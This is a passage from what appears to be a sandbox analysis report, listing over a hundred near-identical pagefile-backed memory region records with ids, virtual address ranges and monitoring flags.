= 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7147 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7148 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7149 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7150 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7151 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7152 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7153 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7154 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7155 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7156 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7157 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7158 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7159 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7160 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7161 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7162 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7163 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7164 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7165 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7166 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7167 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7168 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7169 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7170 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7171 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7172 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7173 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7174 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7175 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7176 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7177 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7178 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7179 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7180 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7181 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7182 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7183 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7184 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7185 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7186 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7187 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7188 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7189 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7190 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7191 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7192 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7193 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7194 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7195 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7196 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7197 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7198 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7199 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7200 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7201 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7202 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7203 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7204 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7205 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7206 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7207 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7208 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7209 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7210 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7211 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7212 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7213 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7214 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7215 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7216 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7217 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7218 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7219 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7220 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7221 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7222 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7223 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7224 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7225 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7226 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7227 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7228 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7229 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7230 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7231 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7232 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7233 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7234 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7235 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7236 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7237 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7238 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7239 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7240 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7241 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7242 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7243 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7244 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7245 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7246 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7247 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7248 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7249 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7250 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7251 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7252 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7253 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7254 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7255 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7256 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7257 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7258 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7259 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7260 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7261 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7262 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7263 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7264 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7265 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7266 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7267 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7268 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7269 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7270 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7271 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7272 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7273 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7274 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7275 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7276 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7277 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7278 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7279 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7280 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7281 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7282 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7283 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7284 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7285 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7286 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7287 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7288 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7289 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7290 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7291 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7292 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7293 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7294 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7295 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7296 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7297 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7298 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7299 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7300 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7301 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7302 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7303 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7304 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7305 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7306 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7307 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7308 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7309 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7310 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 7311 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7312 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7313 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7314 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7315 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7316 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7317 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7318 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7319 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7320 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7321 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7322 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7323 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 7324 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = 